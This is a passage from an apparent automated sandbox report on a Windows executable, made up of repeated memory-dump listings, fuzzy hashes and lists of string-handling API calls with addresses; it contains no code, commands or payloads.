                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @N3{
                          • API String ID: 0-4092127855
                          • Opcode ID: 4437ca4b8de9aa7e38a2f56db44b1abaa8c31c82b31de533734319bc9f537034
                          • Instruction ID: 2ef94e6b1204a1d4f4bdc666f8bbf9e34f114602a731908880622ee80841d362
                          • Opcode Fuzzy Hash: 4437ca4b8de9aa7e38a2f56db44b1abaa8c31c82b31de533734319bc9f537034
                          • Instruction Fuzzy Hash: 2D51F5B3A182044FF344AE29DC85376F7E2EBC4310F16853DDAC487384DE392C498646
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5c663a0e199ca78dd3e5d8ddeedb4072658cd8facd057271914736968a3163a3
                          • Instruction ID: 229f16dbde5122fa47556162f0cc41ce8d36295dc631e561f720852bf474be8a
                          • Opcode Fuzzy Hash: 5c663a0e199ca78dd3e5d8ddeedb4072658cd8facd057271914736968a3163a3
                          • Instruction Fuzzy Hash: 286136B254C609DBD304BF18D8445BEBBE5FB84321F22493EE9C687A00E6395C52DB87
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: edcbe6dfae43a2ea236fa9af29d90a841bb8dd58fa3d415dac2ee6716606715b
                          • Instruction ID: 175727633cbb994aad7ebefbc70e3866e136c3416efd783e5f35fbf554b7a390
                          • Opcode Fuzzy Hash: edcbe6dfae43a2ea236fa9af29d90a841bb8dd58fa3d415dac2ee6716606715b
                          • Instruction Fuzzy Hash: 015135F3A183088FF3056969EC8977AB7D6DBC4720F1A853D9B8487784FC79580582CA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5dcafdb62090acb10235bdbca7212be01fcdefc6ae4458fb516600f2e0b02e61
                          • Instruction ID: ee36f70369e0df1b8a8b47d7e1993e9178aa4d2538123e599bb84d08a7f14f26
                          • Opcode Fuzzy Hash: 5dcafdb62090acb10235bdbca7212be01fcdefc6ae4458fb516600f2e0b02e61
                          • Instruction Fuzzy Hash: 2C5108F3F186184BE3146D6DEC883AAB6C6DBD4320F1B463DDEC887784E979490646C2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3907be89a13336c82756b884287e8f1d856a18eadacc0e71122fba15711c4cb9
                          • Instruction ID: 65d38c8aa594f9d9729053c9ff20e39fdb7b3d5226fadad7b92f7e6cb1065835
                          • Opcode Fuzzy Hash: 3907be89a13336c82756b884287e8f1d856a18eadacc0e71122fba15711c4cb9
                          • Instruction Fuzzy Hash: 685116B3A0C2105FF708A938EC5977BB3D9DBC4730F15C63EEA81C7784E96498058296
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e5da48ac0a59c278373dde98a5b4aed9931b3fef1f87304fbf5316f867e6049
                          • Instruction ID: 33b5d1bb368609daa97c730d3780928c82bca4b23100207d405860fc137ab283
                          • Opcode Fuzzy Hash: 6e5da48ac0a59c278373dde98a5b4aed9931b3fef1f87304fbf5316f867e6049
                          • Instruction Fuzzy Hash: 865115F3E086009BF3186A29DC91779B6D5EB94320F2B463DEBC9837C0E9395C058286
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 796145fc6bd362f6c2307c251ced9c9aedffa3dc91f30e68a7266634a0c25ede
                          • Instruction ID: 7085a730caaf13235e38a29716bc3ed17a11469b6ff3ef80ccd35b01794c6019
                          • Opcode Fuzzy Hash: 796145fc6bd362f6c2307c251ced9c9aedffa3dc91f30e68a7266634a0c25ede
                          • Instruction Fuzzy Hash: 604149F3B182005BF7086E39DC8577ABBD5EBC4724F2A463DE6C5C3380E93558058291
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d3c5a419c10ca8240b571a4fa4e6956effca1f12b92b07ba77fb5dca85f16ca
                          • Instruction ID: 20c1a42d5edca0f024edf89116e838ec754670baf0b29b07cc95095818f28c2a
                          • Opcode Fuzzy Hash: 3d3c5a419c10ca8240b571a4fa4e6956effca1f12b92b07ba77fb5dca85f16ca
                          • Instruction Fuzzy Hash: 2C4126F3A042048FF3449E2CDC45776B6DADBD4720F2A863DDAD4D7788E93999098286
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1d201f6fb1bee0414a12cc6d648bd12aa77b7eeaee5ce3d0d4ed21975b51d19f
                          • Instruction ID: 37ae95eb4c44d1e476c2ae179446cb8c7fc61ace6a86a21da3c56a5c11a7d230
                          • Opcode Fuzzy Hash: 1d201f6fb1bee0414a12cc6d648bd12aa77b7eeaee5ce3d0d4ed21975b51d19f
                          • Instruction Fuzzy Hash: 6551EFF3A087019BE304AE7CEC8576ABBD4EF54320F164A3DEAC5C6B40E67499408687
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5199fa38ad90878959024e70a814657c7498081e9cedb2b34b4ed4361d93118f
                          • Instruction ID: cd747bf76fbe328c63dcdc2fb72ca3781b4779f563d3152f98202605791e789d
                          • Opcode Fuzzy Hash: 5199fa38ad90878959024e70a814657c7498081e9cedb2b34b4ed4361d93118f
                          • Instruction Fuzzy Hash: C2312AF3B1C2005BE31C9E2CEC9577BB7D6EB98310F1A453CE689C3780E97999014556
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25354f816d0f49f1f62c75bf2975770656ac901e55fa3134e58430fa735dd145
                          • Instruction ID: bb3804b4e8dcc11f004ec9f8896ff1790f5c4975e3e83981b494c8b2309f22d0
                          • Opcode Fuzzy Hash: 25354f816d0f49f1f62c75bf2975770656ac901e55fa3134e58430fa735dd145
                          • Instruction Fuzzy Hash: D521E0F3B083004BF704592ADCC576BB69BEBD4320F2B453EDA8487380D87D580A866A
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 003B8636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 003B86AA
                          • StrStrA.SHLWAPI(?,00F2E9C8), ref: 003B86CF
                          • lstrcpyn.KERNEL32(005D93D0,?,00000000), ref: 003B86EE
                          • lstrlen.KERNEL32(?), ref: 003B8701
                          • wsprintfA.USER32 ref: 003B8711
                          • lstrcpy.KERNEL32(?,?), ref: 003B8727
                          • StrStrA.SHLWAPI(?,00F2EB48), ref: 003B8754
                          • lstrcpy.KERNEL32(?,005D93D0), ref: 003B87B4
                          • StrStrA.SHLWAPI(?,00F2EBD8), ref: 003B87E1
                          • lstrcpyn.KERNEL32(005D93D0,?,00000000), ref: 003B8800
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          • Opcode ID: eade56a38943462f646ae7224f6dd3bea636204cfd396b7f574fe60d83906bf7
                          • Instruction ID: bc09ba7cc6fb6048fcbb5f2fb68eaa40488ea4b5743f2dc7bfc2ef23e8bff8e9
                          • Opcode Fuzzy Hash: eade56a38943462f646ae7224f6dd3bea636204cfd396b7f574fe60d83906bf7
                          • Instruction Fuzzy Hash: 73F15171901115AFCB21DB68DD48AEAB7B9EF98300F15459BF909E7350DF30AE05DBA0
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A1F9F
                          • lstrlen.KERNEL32(00F290B8), ref: 003A1FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 003A1FE3
                          • lstrlen.KERNEL32(003D1794), ref: 003A1FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A200E
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A2042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A204D
                          • lstrlen.KERNEL32(003D1794), ref: 003A2058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2075
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A2081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A20AC
                          • lstrlen.KERNEL32(?), ref: 003A20E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2104
                          • lstrcat.KERNEL32(00000000,?), ref: 003A2112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2139
                          • lstrlen.KERNEL32(003D1794), ref: 003A214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A216B
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A2177
